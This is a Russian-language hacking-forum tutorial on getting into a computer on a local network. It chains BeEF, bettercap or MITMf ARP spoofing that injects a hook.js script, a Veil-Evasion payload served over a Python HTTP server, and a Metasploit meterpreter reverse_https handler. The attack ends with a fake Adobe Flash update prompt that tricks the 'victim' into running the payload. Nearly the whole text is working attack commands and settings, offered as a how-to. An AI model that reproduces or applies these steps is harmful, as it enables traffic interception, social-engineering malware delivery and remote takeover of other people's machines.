Соц.инженерия или как доставить полезную нагрузку - получение доступа к удаленному пк в локалке.

Сегодня я хочу рассказать как можно используя связку инструментов, получить доступ к удаленной машине в сегменте локальной сети.
Данный материал предназначен для аудитории которая владеет навыками пользователя в среде линукс, так же есть понимания топологии сетей.
Для этого нам понадобиться:
1.Veil-Evasion.
2.Metasploit.
3.Beef.
4 Bettercap ( Mitmf тоже подойдет ).
Я не буду подробно останавливаться на установке и использовании Veil-Evasion ,
кто не знаком с данным инструментом, у нас на форуме эту тему подробно описали,вот ссылка:
https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
Metasploit и Beef стоят в самом дистрибутиве кали.
Bettercap устанавливаем командой apt-get install bettercap
Кто предпочитает mitmf, то иногда связка mitmf+Beef не корректно работает:

заплатка.png 

лечиться это следующей заплаткой
easy_install -U pip
pip install Twisted==15.5.0


Отдельно хочу отметить инструмент для тестирования на проникновения Beef,
это сокращение от Browser Exploitation Framework (фреймворк эксплуатации браузеров).
Он позволяет выжать максимум из внедрения JS-кода.
Я считаю что на данный момент это лучший инструмент для проведения XSS-атак.

А сейчас давайте приступим к практической реализации.
1. Запускаем фраемворк Beef , его можно запустить как из меню так и из консоли, если запускать из консоли то заходим в каталог используя следующую команду:

cd /usr/share/beef-xss/
./beef

запус beef.png 
Консоль не закрываем!
Далее открываем браузер и в строке вводим следующий адрес

http://localhost:3000/ui/authentication

Login: beef
Pasword: beef

воод пароля beef.png 

после не хитрых манипуляций попадаем в графический интерфейс управления фраемворка.


1111.png 

2.Далее открываем новую консоль и запускаем bettercap, в моем случае строка будет выглядеть следующим образом:

sudo bettercap -T 192.168.0.109 --proxy-module injectjs --js-url "http://192.168.0.102:3000/hook.js"

запуск bettercapa.png 

где адрес 192.168.0.109 -эта машина в отношении которой производиться тестирование.
адрес 192.168.0.102 -это адрес машины с которой мы атакуем.
Консоль не закрываем!

Если кто не знает, как узнать свой ip, то делается это командой ifconfig.

ifconfig.png 

Кто предпочитает пользоваться инструментом mitmf, то строка будет выглядеть следующим образом:

python mitmf.py -i wlan0 --target 192.168.0.109 --gateway 192.168.0.15 --arp --spoof --inject --js-urlhttp://192.168.0.102:3000/hook.js

wlan0-это интерфейс
192.168.0.15 это адрес роутера, узнать его можно командой route -n

routen.png 

Далее нам нужно сгенерировать полезную нагрузку, для этого будем использовать инструмент Veil-Evasion.


Еще раз повторюсь, по данной ссылке:
https://codeby.net/forum/threads/vzlom-udalennogo-pk-veil-evasion-metasploit.57819/
вы можете ознакомится с установкой, а так же, там подробно описано как создать нужный нам файл.

После того как сгенерировали файл , нам нужно запустить сервер.
я это делал в том же каталоге где была сгенерирована полезная нагрузка, следующей командой

python -m SimpleHTTPServer 8081 
консоль не закрываем!

Где 8081 это порт на котором у нас будет крутится сервер.(порт выбирайте произвольно, не обязательно брать такой как у меня.)
Следующим шагом будет запуск метасплойта,(нужно же нам принимать чем то данные, от полезной нагрузки).:rolleyes:
Это можно сделать двумя способами, самым простым на мой взгляд это в новой консоли написать строчку следующего содержания,в моем случае это будет выглядеть так
msfconsole -r /usr/share/veil-output/handlers/load_flash_handler.rc

Для тех кто не ищет легких путей:
запускаем метасплойт командой: msfconsole
далее вводим:

use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.0.102
 (свой внутренний IP )
set LPORT 4444 (вводим порт на котором будет слушаться полезная нагрузка, не путать с портом сервера!!!)
exploit
Консоль не закрываем!
ПО ИТОГУ У НАС ДОЛЖНО БЫТЬ ОТКРЫТЫ ЧЕТЫРЕ КОНСОЛИ.

Сейчас давайте вернемся к нашему фраемворку Beef, перед нами как вы видите, расположен графический интерфейс.
Обратите внимание на крайнюю колонку ,слева сверху, там отображаются ip машин у которых браузеры, уязвимы к атаке xcc, и наш beef их подцепил.
Дальше, мы выбираем наш подцепленный браузер и переходим во вкладку Commands.

beef левая колонка.png 

Находим там пункт Social Engineering, далее Fake Flash Update, кликаем на нем, и перед нами откроется окно где вместо ip по умолчанию, нужно будет вставить наши данные.
В моем случае это выглядит таким образом :
http://192.168.0.102:3000/adobe/flash_update.png
http://192.168.0.102:8081/flash_update12.exe 

последняя фаза beef.png 

Далее в нижнем правом углу нажимаем на кнопку Execute.
Если вы все сделали верно, то на машине у жерты появиться окно для обновления Adobe Flash Player.Как только жертва запустит обновление, у нас откроется сессия.